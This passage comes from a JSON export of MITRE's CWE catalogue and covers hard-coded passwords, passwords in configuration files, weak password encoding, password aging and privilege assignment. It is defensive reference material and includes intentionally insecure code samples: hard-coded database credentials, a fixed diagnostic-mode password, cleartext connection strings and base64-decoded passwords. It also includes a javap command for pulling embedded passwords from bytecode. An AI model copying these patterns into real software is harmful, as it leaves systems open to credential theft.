(Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and perform a login. Using disassembled code, look at the associated instructions and see if any of them appear to be comparing the input to a fixed string or value."]}}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"For outbound authentication: store passwords outside of the code in a strongly-protected, encrypted configuration file or database that is protected from access by all outsiders, including other local users on the same system. Properly protect the key (CWE-320). If you cannot use encryption to protect the file, then make sure that the permissions are as restrictive as possible."},{"Phase":"Architecture and Design","Description":"For inbound authentication: Rather than hard-code a default username and password for first time logins, utilize a \\"first login\\" mode that requires the user to enter a unique strong password."},{"Phase":"Architecture and Design","Description":"Perform access control checks and limit which entities can access the feature that requires the hard-coded password. For example, a feature might only be enabled through the system console instead of through a network connection."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For inbound authentication: apply strong one-way hashes to your passwords and store those hashes in a configuration file or database with appropriate access control. That way, theft of the file/database still requires the attacker to try to crack the password. When receiving an incoming password during authentication, take the hash of the password and compare it to the hash that you have saved.","Use randomly assigned salts for each separate hash that you generate. This increases the amount of computation that an attacker needs to conduct a brute-force attack, possibly limiting the effectiveness of the rainbow table method."]}},{"Phase":"Architecture and Design","Description":{"xhtml:p":"For front-end to back-end connections: Three solutions are possible, although none are complete.","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["The first suggestion involves the use of generated passwords which are changed automatically and must be entered at given time intervals by a system administrator. These passwords will be held in memory and only be valid for the time intervals.","Next, the passwords used should be limited at the back end to only performing actions valid for the front end, as opposed to having full access.","Finally, the messages sent should be tagged and checksummed with time sensitive values so as to prevent replay style attacks."]}}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-13"},"Intro_Text":"The following code uses a hard-coded password to connect to a database:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...DriverManager.getConnection(url, \\"scott\\", \\"tiger\\");...","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"javap -c ConnMngr.class","xhtml:div":{"#text":"22: ldc #36; //String jdbc:mysql://ixne.com/rxsql24: ldc #38; //String scott26: ldc #17; //String tiger","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}],"Body_Text":"This is an example of an external hard-coded password on the client-side of a connection. This code will run successfully, but anyone who has access to it will have access to the password. Once the program has shipped, there is no going back from the database user \\"scott\\" with a password of \\"tiger\\" unless the program is patched. A devious employee with access to this information can use it to break into the system. Even worse, if attackers have access to the bytecode for application, they can use the javap -c command to access the disassembled code, which will contain the values of the passwords used. The result of this operation might look something like the following for the example above:"},{"attr":{"@_Demonstrative_Example_ID":"DX-14"},"Intro_Text":"The following code is an example of an internal hard-coded password in the back-end:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (strcmp(password, \\"Mew!\\")) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0)","xhtml:br":""}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (!password.equals(\\"Mew!\\")) {}//Diagnostic Modereturn(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return(0)","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}}}],"Body_Text":"Every instance of this program can be placed into diagnostic mode with the same password. Even worse is the fact that if this program is distributed as a binary-only distribution, it is very difficult to change that password or disable this \\"functionality.\\""},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Password Management: Hard-Coded Password"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Use of hard-coded password"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC03-J","Entry_Name":"Never hard code sensitive information"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP33","Entry_Name":"Hardcoded sensitive data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}}]},"Notes":{"Note":{"#text":"This entry could be split into multiple variants: an inbound variant (as seen in the second demonstrative example) and an outbound variant (as seen in the first demonstrative example). These variants are likely to have different consequences, detectability, etc. More importantly, from a vulnerability theory perspective, they could be characterized as different behaviors.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-13","Modification_Comment":"Significant description modifications to emphasize different variants."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Description, Detection_Factors, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Hard-Coded Password","attr":{"@_Date":"2010-02-16"}}}},"260":{"attr":{"@_ID":"260","@_Name":"Password in Configuration File","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software stores a password in a configuration file that might be accessible to actors who do not know the password.","Extended_Description":"This can result in compromise of the system for which the password is used. An attacker could gain access to this file and learn the stored password or worse yet, change the password to one of their choosing.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"522","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Avoid storing passwords in easily accessible locations."},{"Phase":"Architecture and Design","Description":"Consider storing cryptographic hashes of passwords as an alternative to storing in plaintext."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Below is a snippet from a Java properties file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"webapp.ldap.username = secretUsernamewebapp.ldap.password = secretPassword","xhtml:br":""}},"Body_Text":"Because the LDAP credentials are stored in plaintext, anyone with access to the file can gain access to the resource."},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Password Management: Password in Configuration File"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-207"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"261":{"attr":{"@_ID":"261","@_Name":"Weak Encoding for Password","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Obscuring a password with a trivial encoding does not protect the password.","Extended_Description":"Password management issues occur when a password is stored in plaintext in an application\'s properties or configuration file. A programmer can attempt to remedy the password management problem by obscuring the password with an encoding function, such as base 64 encoding, but this effort does not adequately protect the password.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"326","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Description":"Passwords should be encrypted with keys that are at least 128 bits in length for adequate security."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code reads a password from a properties file and uses the password to connect to a database.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...Properties prop = new Properties();prop.load(new FileInputStream(\\"config.properties\\"));String password = Base64.decode(prop.getProperty(\\"password\\"));DriverManager.getConnection(url, usr, password);...","xhtml:br":["","","","",""]}},"Body_Text":"This code will run successfully, but anyone with access to config.properties can read the value of password and easily determine that the value has been base 64 encoded. If a devious employee has access to this information, they can use it to break into the system."},{"Intro_Text":"The following code reads a password from the registry and uses the password to create a new network credential.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"...string value = regKey.GetValue(passKey).ToString();byte[] decVal = Convert.FromBase64String(value);NetworkCredential netCred = newNetworkCredential(username,decVal.toString(),domain);...","xhtml:br":["","","",""]}},"Body_Text":"This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Password Management: Weak Cryptography"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"55"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-207"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}}]},"Notes":{"Note":{"attr":{"@_Type":"Other"},"xhtml:p":"The \\"crypt\\" family of functions uses weak cryptographic algorithms and should be avoided. It may be present in some projects for compatibility."}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Other_Notes, References, Relationships, Type"}],"Previous_Entry_Name":{"#text":"Weak Cryptography for Passwords","attr":{"@_Date":"2020-02-24"}}}},"262":{"attr":{"@_ID":"262","@_Name":"Not Using Password Aging","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"If no mechanism is in place for managing password aging, users will have no incentive to update passwords in a timely manner.","Extended_Description":"Security experts have often recommended that users change their passwords regularly and avoid reusing passwords. Although this can be an effective mitigation, if the expiration window is too short, it can cause users to generate poor or predictable passwords. As such, it is important to discourage creating similar passwords. It is also useful to have a password aging mechanism that notifies users when passwords are considered old and requests that they replace them with new, strong passwords. Companion documentation which stresses how important this practice is can help users understand and better support this approach.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"309","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"263","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"324","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"As passwords age, the probability that they are compromised grows."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"As part of a product\'s design, require users to change their passwords regularly and avoid reusing previous passwords."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A system does not enforce the changing of passwords every certain period."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Not allowing password aging"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Description, Potential_Mitigations, References, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Not Allowing Password Aging","attr":{"@_Date":"2008-04-11"}}}},"263":{"attr":{"@_ID":"263","@_Name":"Password Aging with Long Expiration","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Allowing password aging to occur unchecked can result in the possibility of diminished password integrity.","Extended_Description":"Just as neglecting to include functionality for the management of password aging is dangerous, so is allowing password aging to continue unchecked. Passwords must be given a maximum life span, after which a user is required to update with a new and different password.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"As passwords age, the probability that they are compromised grows."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Ensure that password aging is limited so that there is a defined maximum age for passwords and so that the user is notified several times leading up to the password expiration."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A system requires the changing of passwords every five years."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Allowing password aging"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Allowing Unchecked Password Aging","attr":{"@_Date":"2008-04-11"}}}},"266":{"attr":{"@_ID":"266","@_Name":"Incorrect Privilege Assignment","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"286","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"A user can access restricted functionality and/or sensitive information that may include administrative functionality and user 